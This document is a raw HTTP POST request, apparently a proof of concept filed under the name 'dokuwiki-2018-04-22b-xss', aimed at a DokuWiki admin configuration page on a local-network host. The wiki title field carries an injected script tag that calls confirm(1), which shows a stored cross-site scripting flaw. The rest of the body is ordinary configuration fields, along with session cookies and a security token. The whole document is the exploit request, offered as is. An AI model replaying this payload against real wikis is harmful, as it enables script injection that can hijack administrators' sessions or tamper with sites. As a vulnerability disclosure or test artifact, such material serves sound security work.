dokuwiki-2018-04-22b-xss.txt
POST /doku.php HTTP/1.1
Host: 192.168.1.49
Content-Length: 7726
Cache-Control: max-age=0
Origin: http://192.168.1.49
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://192.168.1.49/doku.php?id=start&do=admin&page=config
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: DokuWiki=8h3a23e7c2lnhj6q3g69bcb17l; DW68700bfd16c2027de7de74a5a8202a6f=dXNlcg%3D%3D%7C0%7C0pDGaOqk89XqSSg6qfAn1i6oHNRYzJbctgXDGkKcqv0%3D; DOKU_PREFS=list%23thumbs%23ext_enabled%231%23ext_disabled%231%23ext_updatable%231
Connection: close
id=start&sectok=7d0965a15bb314aefc1866dfb6870d3e&config%5Btitle%5D=user's%20DokuWiki!%7d%7dsc94n%3cscript%3econfirm(1)%3c%2fscript%3epnhi4&config%5Bstart%5D=start&config%5Blang%5D=en&config%5Btagline%5D=&config%5Bsidebar%5D=sidebar&config%5Blicense%5D=cc-by-nc-sa&config%5Bsavedir%5D=%2Fopt%2Fbitnami%2Fapps%2Fdokuwiki%2Fhtdocs%2Fdata&config%5Bbasedir%5D=&config%5Bbaseurl%5D=&config%5Bcookiedir%5D=&config%5Bdmode%5D=0755&config%5Bfmode%5D=0644&config%5Brecent%5D=20&config%5Brecent_days%5D=7&config%5Bbreadcrumbs%5D=10&config%5Btypography%5D=1&config%5Bdformat%5D=%25Y%2F%25m%2F%25d+%25H%3A%25M&config%5Bsignature%5D=+---+%2F%2F%5B%5B%40MAIL%40%7C%40NAME%40%5D%5D+%40DATE%40%2F%2F&config%5Bshowuseras%5D=loginname&config%5Btoptoclevel%5D=1&config%5Btocminheads%5D=3&config%5Bmaxtoclevel%5D=3&config%5Bmaxseclevel%5D=3&config%5Bdeaccent%5D=1&config%5Buseheading%5D=0&config%5Bhidepages%5D=&config%5Buseacl%5D=1&config%5Bautopasswd%5D=1&config%5Bauthtype%5D=authplain&config%5Bpasscrypt%5D=smd5&config%5Bdefaultgroup%5D=user&config%5Bsuperuser%5D=%40admin&config%5Bmanager%5D=%21%21not+set%21%21&config%5Bprofileconfirm%5D=1&config%5Brememberme%5D=1&config%5Bdisableactions%5D%5Bother%5D=&config%5Bauth_security_timeout%5D=900&config%5Bsecurecookie%5D=1&config%5Bremoteuser%5D=%21%21not+set%21%21&config%5Busewordblock%5D=1&config%5Brelnofollow%5D=1&config%5Bindexdelay%5D=60*60*24*5&config%5Bmailguard%5D=hex&config%5Biexssprotect%5D=1&config%5Busedraft%5D=1&config%5Blocktime%5D=15*60&config%5Bcachetime%5D=60*60*24&config%5Btarget____wiki%5D=&config%5Btarget____interwiki%5D=&config%5Btarget____extern%5D=&config%5Btarget____media%5D=&config%5Btarget____windows%5D=&config%5Bmediarevisions%5D=1&config%5Bgdlib%5D=2&config%5Bim_convert%5D=&config%5Bjpg_quality%5D=70&config%5Bfetchsize%5D=0&config%5Brefcheck%5D=1&config%5Bsubscribe_time%5D=24*60*60&config%5Bnotify%5D=&config%5Bregisternotify%5D=&config%5Bmailfrom%5D=&config%5Bmailreturnpath%5D=&config%5Bmailprefix%5D=&config%5Bhtmlmail%5D=1&config%
5Bsitemap%5D=0&config%5Brss_type%5D=rss1&config%5Brss_linkto%5D=diff&config%5Brss_content%5D=abstract&config%5Brss_media%5D=both&config%5Brss_update%5D=5*60&config%5Brss_show_summary%5D=1&config%5Bupdatecheck%5D=1&config%5Buserewrite%5D=0&config%5Bsepchar%5D=_&config%5Bfnencode%5D=url&config%5Bcompress%5D=1&config%5Bcssdatauri%5D=512&config%5Bcompression%5D=gz&config%5Bxsendfile%5D=0&config%5Breaddircache%5D=0&config%5Bsearch_nslimit%5D=0&config%5Bsearch_fragment%5D=exact&config%5Bdnslookups%5D=1&config%5Bjquerycdn%5D=0&config%5Bproxy____host%5D=&config%5Bproxy____port%5D=&config%5Bproxy____user%5D=&config%5Bproxy____pass%5D=&config%5Bproxy____except%5D=&config%5Bftp____host%5D=localhost&config%5Bftp____port%5D=21&config%5Bftp____user%5D=user&config%5Bftp____pass%5D=&config%5Bftp____root%5D=%2Fhome%2Fuser%2Fhtdocs&config%5Bplugin____authmysql____server%5D=&config%5Bplugin____authmysql____user%5D=&config%5Bplugin____authmysql____password%5D=&config%5Bplugin____authmysql____database%5D=&config%5Bplugin____authmysql____charset%5D=utf8&config%5Bplugin____authmysql____debug%5D=0&config%5Bplugin____authmysql____TablesToLock%5D=&config%5Bplugin____authmysql____checkPass%5D=&config%5Bplugin____authmysql____getUserInfo%5D=&config%5Bplugin____authmysql____getGroups%5D=&config%5Bplugin____authmysql____getUsers%5D=&config%5Bplugin____authmysql____FilterLogin%5D=&config%5Bplugin____authmysql____FilterName%5D=&config%5Bplugin____authmysql____FilterEmail%5D=&config%5Bplugin____authmysql____FilterGroup%5D=&config%5Bplugin____authmysql____SortOrder%5D=&config%5Bplugin____authmysql____addUser%5D=&config%5Bplugin____authmysql____addGroup%5D=&config%5Bplugin____authmysql____addUserGroup%5D=&config%5Bplugin____authmysql____delGroup%5D=&config%5Bplugin____authmysql____getUserID%5D=&config%5Bplugin____authmysql____delUser%5D=&config%5Bplugin____authmysql____delUserRefs%5D=&config%5Bplugin____authmysql____updateUser%5D=&config%5Bplugin____authmysql____UpdateLogin%5D=&config%5Bplugin____aut
hmysql____UpdatePass%5D=&config%5Bplugin____authmysql____UpdateEmail%5D=&config%5Bplugin____authmysql____UpdateName%5D=&config%5Bplugin____authmysql____UpdateTarget%5D=&config%5Bplugin____authmysql____delUserGroup%5D=&config%5Bplugin____authmysql____getGroupID%5D=&config%5Bplugin____smtp____smtp_host%5D=localhost&config%5Bplugin____smtp____smtp_port%5D=25&config%5Bplugin____smtp____smtp_ssl%5D=&config%5Bplugin____smtp____auth_user%5D=&config%5Bplugin____smtp____auth_pass%5D=&config%5Bplugin____smtp____localdomain%5D=&config%5Bplugin____authldap____server%5D=&config%5Bplugin____authldap____port%5D=389&config%5Bplugin____authldap____usertree%5D=&config%5Bplugin____authldap____grouptree%5D=&config%5Bplugin____authldap____userfilter%5D=&config%5Bplugin____authldap____groupfilter%5D=&config%5Bplugin____authldap____version%5D=2&config%5Bplugin____authldap____referrals%5D=-1&config%5Bplugin____authldap____deref%5D=0&config%5Bplugin____authldap____binddn%5D=&config%5Bplugin____authldap____bindpw%5D=&config%5Bplugin____authldap____userscope%5D=sub&config%5Bplugin____authldap____groupscope%5D=sub&config%5Bplugin____authldap____userkey%5D=uid&config%5Bplugin____authldap____groupkey%5D=cn&config%5Bplugin____authldap____modPass%5D=1&config%5Bplugin____authpgsql____server%5D=&config%5Bplugin____authpgsql____port%5D=5432&config%5Bplugin____authpgsql____user%5D=&config%5Bplugin____authpgsql____password%5D=&config%5Bplugin____authpgsql____database%5D=&config%5Bplugin____authpgsql____checkPass%5D=&config%5Bplugin____authpgsql____getUserInfo%5D=&config%5Bplugin____authpgsql____getGroups%5D=&config%5Bplugin____authpgsql____getUsers%5D=&config%5Bplugin____authpgsql____FilterLogin%5D=&config%5Bplugin____authpgsql____FilterName%5D=&config%5Bplugin____authpgsql____FilterEmail%5D=&config%5Bplugin____authpgsql____FilterGroup%5D=&config%5Bplugin____authpgsql____SortOrder%5D=&config%5Bplugin____authpgsql____addUser%5D=&config%5Bplugin____authpgsql____addGroup%5D=&config%5Bplugin____authpgsql__
__addUserGroup%5D=&config%5Bplugin____authpgsql____delGroup%5D=&config%5Bplugin____authpgsql____getUserID%5D=&config%5Bplugin____authpgsql____delUser%5D=&config%5Bplugin____authpgsql____delUserRefs%5D=&config%5Bplugin____authpgsql____updateUser%5D=&config%5Bplugin____authpgsql____UpdateLogin%5D=&config%5Bplugin____authpgsql____UpdatePass%5D=&config%5Bplugin____authpgsql____UpdateEmail%5D=&config%5Bplugin____authpgsql____UpdateName%5D=&config%5Bplugin____authpgsql____UpdateTarget%5D=&config%5Bplugin____authpgsql____delUserGroup%5D=&config%5Bplugin____authpgsql____getGroupID%5D=&config%5Bplugin____authpdo____dsn%5D=&config%5Bplugin____authpdo____user%5D=&config%5Bplugin____authpdo____pass%5D=&config%5Bplugin____authpdo____select-user%5D=&config%5Bplugin____authpdo____check-pass%5D=&config%5Bplugin____authpdo____select-user-groups%5D=&config%5Bplugin____authpdo____select-groups%5D=&config%5Bplugin____authpdo____insert-user%5D=&config%5Bplugin____authpdo____delete-user%5D=&config%5Bplugin____authpdo____list-users%5D=&config%5Bplugin____authpdo____count-users%5D=&config%5Bplugin____authpdo____update-user-info%5D=&config%5Bplugin____authpdo____update-user-login%5D=&config%5Bplugin____authpdo____update-user-pass%5D=&config%5Bplugin____authpdo____insert-group%5D=&config%5Bplugin____authpdo____join-group%5D=&config%5Bplugin____authpdo____leave-group%5D=&config%5Bplugin____authad____account_suffix%5D=&config%5Bplugin____authad____base_dn%5D=&config%5Bplugin____authad____domain_controllers%5D=&config%5Bplugin____authad____sso_charset%5D=&config%5Bplugin____authad____admin_username%5D=&config%5Bplugin____authad____admin_password%5D=&config%5Bplugin____authad____expirywarn%5D=0&config%5Bplugin____authad____additional%5D=&do=admin&page=config&save=1&submit=